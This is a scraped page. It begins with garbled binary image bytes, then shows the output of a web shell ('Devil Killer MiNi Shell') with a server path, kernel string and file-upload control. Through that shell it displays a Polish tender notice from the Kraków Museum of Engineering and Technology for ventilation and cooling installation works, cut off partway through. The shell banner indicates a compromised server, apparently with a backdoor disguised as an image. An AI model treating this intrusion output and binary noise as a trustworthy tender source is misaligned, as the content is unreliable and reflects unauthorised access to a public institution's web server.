JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250430/0021279201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych polegających na instalacji wentylacji mechanicznej w hali E, wspomagania wentylacji grawitacyjnej w hali H i instalacji chłodniczej wraz z agregatem dla hali E, H, G i P1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Inżynierii i Techniki w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351535611</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Wawrzyńca 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">muzeum@mit.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mit.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych polegających na instalacji wentylacji mechanicznej w hali E, wspomagania wentylacji grawitacyjnej w hali H i instalacji chłodniczej wraz z agregatem dla hali E, H, G i P1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68066bd6-44ad-4a5d-bda0-59f1996f9286</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00212792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00069641/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie robót budowlanych wentylacji mechanicznej w hali E, wspomagania wentylacji grawitacyjnej w hali H i instalacji chłodniczej wraz z agregatem dla hali E, H, G i P1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-68066bd6-44ad-4a5d-bda0-59f1996f9286 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-68066bd6-44ad-4a5d-bda0-59f1996f9286</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 63 ust. 2 ustawy, „w<br/>postępowaniu o udzielenie zamówienia (…) o wartości mniejszej niż progi unijne ofertę, (…), oświadczenie, o którym mowa w art.<br/>125 ust. 1, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym”.<br/>1.1. Forma elektroniczna oznacza opatrzenie dokumentu (pliku) elektronicznego kwalifikowanym podpisem elektronicznym.<br/>1.2. Rygor nieważności opisany w pkt 8.1. SWZ dotyczy zatem przypadków niedochowania formy złożenia następujących<br/>dokumentów:<br/>1) Formularza Oferty i dołączanych do niego innych dokumentów składających się na sensu stricte treść oferty Wykonawcy w tym<br/>Zał. nr 1 A do SWZ.<br/>2) Oświadczeń z art. 125 ust. 1 ustawy, tj. &lt;&lt;oświadczeń o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu lub kryteriów selekcji&gt;&gt;, o których mowa w pkt 6.1.5. SWZ, składanych samodzielnie przez Wykonawców, zgodnie z<br/>pkt 6.1.5. lit. a SWZ.<br/>3) Oświadczeń z art. 125 ust. 1 ustawy składanych – na podstawie art. 125 ust. 5 ustawy – przez podmioty, o których mowa w pkt<br/>6.1.5 lit. b SWZ, tj. podmioty, które nie są Wykonawcami, ale udostępniają Wykonawcy swoje zasoby w celu wykazania spełniania<br/>określonego warunku/ów udziału w postępowaniu.<br/>4) Pełnomocnictw, o których mowa w pkt 6.1.2. lit. b SWZ.<br/>2. Pozostałe dokumenty i oświadczenia, inne niż wymienione w pkt 8.1 SWZ, w tym w szczególności:<br/>2.1. podmiotowe środki dowodowe, o których mowa w pkt 6.2. SWZ, w tym oświadczenie, o którym mowa w pkt 6.1.4. SWZ (tzw.<br/>oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 ustawy)<br/>2.2. dokumenty potwierdzające umocowanie do reprezentowania, o których mowa w pkt 6.1.2. – inne niż pełnomocnictwa, odpisy lub<br/>informacje z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru – a zatem dokumenty potwierdzające umocowanie do reprezentowania odpowiednio:<br/>1) Wykonawcy,<br/>2) Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,<br/>3) podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy,<br/>4) podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach – jeżeli dotyczy,<br/>2.3. zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 6.1.3 SWZ,<br/>1) przedmiotowe środki dowodowe – o ile są wymagane w postępowaniu,<br/>2) inne niż ww. informacje, oświadczenia lub dokumenty,<br/>przekazywane są w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym), lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym, a zatem z zachowaniem tej samej formy i postaci co dokumenty<br/>wymienione w pkt 8.1. SWZ, z tą różnicą, iż w przypadku niedochowania formy i/lub postaci przekazania brak jest sankcji<br/>nieważności.<br/>3. W przypadku, gdy odpisy lub informacje z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru, a także inne podmiotowe<br/>i przedmiotowe środki dowodowe, lub inne dokumenty opisane w § 6 ust. 1 rozporządzenia przywołanego w pkt 8.4. SWZ poniżej,<br/>zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia, podmiot udostępniający zasoby lub podwykonawca, jako dokument elektroniczny - przekazuje się ten dokument. W<br/>przypadku natomiast, gdy ww. kategorie dokumentów zostały wystawione jako dokument w postaci papierowej, przekazuje się<br/>cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-68066bd6-44ad-4a5d-bda0-59f1996f9286</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Muzeum Inżynierii i Techniki w Krakowie, (31-060) Krakowie, ul. św. Wawrzyńca 15,<br/>działając zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 roku.<br/>1) administratorem danych osobowych przekazanych przez Wykonawcę w ofercie i we wszelkich dokumentach składanych w postępowaniu o udzielenie niniejszego postępowania jest Zamawiający – Muzeum Inżynierii i Techniki w Krakowie, (31-060) Krakowie, ul. św. Wawrzyńca 15,<br/>2) Inspektor Ochrony Danych – kontakt: e-mail:iod@mit.krakow.pl poczta tradycyjna: Muzeum Inżynierii i Techniki, ul. św. Wawrzyńca 15, 31-060 Kraków<br/>3) Przetwarzanie danych, o których mowa w pkt 1) w celu związanym z niniejszym postępowaniem<br/>o udzielenie zamówienia publicznego następuje na podstawie z art. 6 ust. 1 lit. b i c Rozporządzenia,<br/>4) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>5) ww. dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia 6) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy pzp, konsekwencje<br/>niepodania danych wynikają z ustawy pzp.<br/>7) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich sprostowania, ograniczenia przetwarzania.<br/>8) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia skargi do organu<br/>nadzorczego.<br/>9) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOT.26.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na instalacji wentylacji mechanicznej w hali E, wspomagania wentylacji grawitacyjnej w hali H i instalacji chłodniczej wraz z agregatem dla hali E, H, G i P1 oraz instalacji zasilania elektrycznego, dz. 125/5 obr. 12 Śródmieście – Muzeum Inżynierii i Techniki w Krakowie, ul. św. Wawrzyńca 15. Zakres prac obejmuje w szczególności:<br/><br/>Hala E m.in.:<br/>	montaż centrali wentylacyjnej w hali E,<br/>	wydzielenie akustyczne poddasza w miejscu montażu centrali tj. obudowa poddasza płytami akustycznymi oraz wykończenie podłogi poddasza matą kauczukową,<br/>	uzupełnienie ocieplenia i paroizolacji oraz wykończenie poddasza w systemie lekkiej zabudowy płytami akustycznymi,<br/>	wyprowadzenie kanału czerpni ściennej w oknie świetlika kalenicowego,<br/>	obudowa kanału czerpni, <br/>	montaż dwóch wyrzutni ściennych, uzupełnienie otworów po osadzeniu, montaż kratek,<br/>	montaż klimakonwektorów podwieszonych, wykonanie instalacji zasilających, elektrycznych<br/><br/>Hala H m.in.:<br/>	podwieszenie klimatonwektorów sufitowych, wykonanie instalacji zasilających, elektrycznych<br/><br/>Przewiązka P1:<br/>	montaż wentylatora nawiewnego w ścianie przewiązki, <br/>	montaż klimakonwektora ściennego, doprowadzenie instalacji<br/><br/>Zagospodarowanie<br/>	posadowienie agregatu wody lodowej<br/>	wykonanie instalacji chłodniczej <br/>	instalacji elektrycznej zasilającej agregat wody lodowej<br/>	montaż ekranu akustycznego<br/><br/>3.2.	Roboty budowlane należy wykonać w oparciu o: <br/>3.2.1.	dokumentację projektową stanowiącą załącznik nr 8 do SWZ w tym zakres prac wskazany w projekcie zamiennym <br/>Uwaga!!! Nastąpiła zmiana dokumentacji projektowej w zakresie m.in.:<br/>a)	rezygnacja z demontażu istniejącej instalacji grzewczej w hali E,<br/>b)	zmiana klimakonwektorów naściennych na sufitowe z opcją grzania i chłodzenia w hali E w oparciu o węzeł cieplny i funkcją chłodzenia w oparciu o agregat wody lodowej,<br/>c)	zmiana klimakonwektorów naściennych na sufitowe z opcją chłodzenia w hali H w oparciu o agregat wody lodowej.<br/>3.2.2.	Specyfikacje Techniczną Wykonania i Odbioru Robót Budowlanych - załącznik nr 8 do SWZ.<br/>3.2.3.	Pozwoleniem na budowę: Decyzja nr 603/6740.1/2022 z 17 maja 2022 r. - załącznik nr 8 do SWZ.<br/>3.2.4.	Pozwoleniem ZN-I.5142.159.2022 Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót budowlanych na obszarze wpisanym do rejestru zabytków - załącznik nr 8 do SWZ.<br/>3.3.	Budynki jak i teren objęty robotami wpisane są do rejestru zabytków pod numerem A – 680. <br/>3.4.	W hali E, H pozostanie wyposażenie tj. zabudowy, elementy aranżacji wystawy stałej, obiekty muzealne. Wykonawca przy prowadzeniu prac zobowiązany jest do ich właściwego zabezpieczenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w dwóch kryteriach ceny i kryterium jakościowe</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu o którym mowa w pkt 4 SWZ tj. realizacji prac prowadzonych wewnątrz budynków E i H, które uniemożliwiają zwiedzanie wystawy stałej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy – spełniają warunki udziału w postępowaniu, dotyczące zdolności technicznej lub zawodowej, tj.: , <br/>5.1.1.	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej 2 roboty budowlane polegające na wykonaniu instalacji wentylacji i klimatyzacji o wartości nie mniejszej niż 500 000,00 zł brutto każda, w budynkach użyteczności publicznej <br/><br/>uwagi:<br/>1)	Zamawiający nie dopuszcza sumowania robót budowlanych w ramach odrębnych kontraktów (umów/zamówień) celem uzyskania wymaganego warunku kwotowego<br/>2)	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur<br/>3)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: - warunek określony w pkt. 5.1. powyżej może być spełniony przez Wykonawców wspólnie. W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się złożenia oświadczenia zgodnie z art. 117 ust. 4 ustawy Pzp wg. wzoru w Zał. nr 7 do SWZ.<br/><br/>UWAGA: W każdym przypadku pod pojęciem obiektu użyteczności publicznej zamawiający rozumie budynek służący celom administracji publicznej, wymiaru sprawiedliwości, mieszkalnym, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym., poczty lub telekomunikacji oraz o charakterze biurowym i socjalnym oraz innym podobnym celom lub o funkcji mieszanej zawierającej powyżej określone funkcje<br/><br/>5.1.2.	wykaże, że dysonuje odpowiednimi osobami do wykonania zamówienia:<br/>i.	jedną osobę mającą pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, odpowiadające wymaganiom określonym w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym, łącznie z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego;<br/>ii.	jedną osobę mającą pełnić funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych, odpowiadające wymaganiom określonym w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym, łącznie z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego;<br/>iii.	jedną osobę mającą pełnić funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych odpowiadające wymaganiom określonym w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym, łącznie z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego;<br/><br/><br/>Zamawiający dopuszcza łączenie nie więcej niż dwóch spośród ww. funkcji przez jedną osobę. <br/>Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. m.in. w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020r. poz. 2020) lub zgodnie z wcześniej obowiązującymi przepisami dotyczące uznawania ww. kwalifikacji lub posiadać prawo do świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. 2019 poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">6.2.1.	Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt 6.1.5.1. SWZ w zakresie podstaw 